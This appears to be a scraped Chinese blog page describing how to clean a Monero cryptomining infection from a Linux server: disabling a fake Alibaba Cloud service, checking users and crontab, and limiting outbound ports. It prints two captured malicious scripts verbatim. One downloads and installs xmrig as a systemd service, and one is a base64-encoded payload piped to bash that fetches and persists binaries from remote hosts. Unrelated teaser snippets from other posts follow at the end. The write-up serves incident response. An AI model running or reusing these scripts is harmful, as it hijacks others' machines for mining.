- VisualStudio2022插件的安装及使用-编程手把手系列文章
- pprof-在现网场景怎么用
- C#实现的下拉多选框,下拉多选树,多级节点
- 【学习笔记】基础数据结构:猫树
执行systemctl list-unit-files --type=service | grep enabled命令列出全部自启动项,有异常启动项执行systemctl disable A_li_yun_Duns.service删除。A_li_yun_Duns.service为自启动项名称.
执行vi /etc/passwd检查系统用户,如有异常用户将其禁用,执行passwd -l 用户名 。
执行crontab -e查看定时任务有无默认任务添加进来。若有将其注释掉或删掉。将其执行的脚本文件一起删除.
本次根目录下异常文件为wawa.sh、update_udp.sh,以下为wawa.sh脚本内容 。
#!/bin/bash
cd /root;wget http://zhongcheng-app.oss-cn-beijing.aliyuncs.com/image/image/xmrig-6.21.1-linux-static-x64.tar.gz;tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;systemctl stop monero.service;rm -rf /etc/systemd/system/monero.service;wget http://zcapp.oss-cn-beijing.aliyuncs.com/icon/monero.service;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv monero.service /etc/systemd/system/monero.service;systemctl daemon-reload;systemctl enable monero.service;systemctl start monero.service
以下为update_udp.sh脚本内容,命令做了base64加密,需要base64解密 。
#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s
解读脚本内容,将涉及到的文件清除 。
发现xmrig目录清除 。
执行cd /etc/systemd/system,检查该目录下有无异常服务文件,本次异常文件为A_li_yun_Duns.service,伪装成了阿里云安全服务.
。
处理策略 。
1.尽量较少对公网开放的端口,尤其是mq的.
2.关闭全部安全组出方向端口,用到哪个开启哪个。挖矿程序需要请求网络领取任务,这样挖矿程序就没任务可执行.
最后此篇关于挖矿病毒处理流程(门罗币)的文章就讲到这里了,如果你想了解更多关于挖矿病毒处理流程(门罗币)的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
病毒 本文灵感来自尼尔盖曼短篇小说集•《烟与镜》•《病毒》。 1 最近服务器监控系统频繁的向我发出告警信号,通过告警内容,提示我有一台服务器出现了异常。我看到了主要是两类问题,一类
假设您有 users 并且知道 n 增加了固定数量的用户 c 每天和病毒增长率 k 每天,其中 k 表示为 n 的百分比。 你怎么知道用户群增长到规模需要多少天 x ,其中 x > n? 这是一个复利
已关闭。此问题不符合Stack Overflow guidelines 。目前不接受答案。 这个问题似乎不是关于 a specific programming problem, a software
关闭。这个问题是off-topic .它目前不接受答案。 想改进这个问题吗? Update the question所以它是on-topic用于堆栈溢出。 关闭 10 年前。 Improve thi
我在 Eclipse4.6 上安装 Anguar IDE 插件时不小心安装了 CodeMix 恶意软件。现在,每次我打开 JS 文件时,它都会显示 CodeMix 注册窗口,如果我不提供电子邮件帐户,
假设您有一个 example.txt(或可使用 .fs 读取以获取文本数据的所有其他文件格式),并且此文本文件中包含病毒/恶意软件。 当您执行该文件时,您将感染病毒。 但是,如果您使用 node.js
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 4 年前。 Improve this ques
有一个 InnoDB 表用于存储自定义构建的 Web 应用程序使用的博客文章的评论。 最近我注意到评论的自动递增主键值递增 2 而不是仅递增 1。 我还注意到,在另一个用于记住最后几个评论者足迹签名(
我的 linux 服务器上几乎所有的 php 文件和一些 html 文件中都添加了以下行在不损坏任何其他东西的情况下删除它的命令是什么? iframe qoluu='V5pEXGSm' src=' h
我是一名优秀的程序员,十分优秀!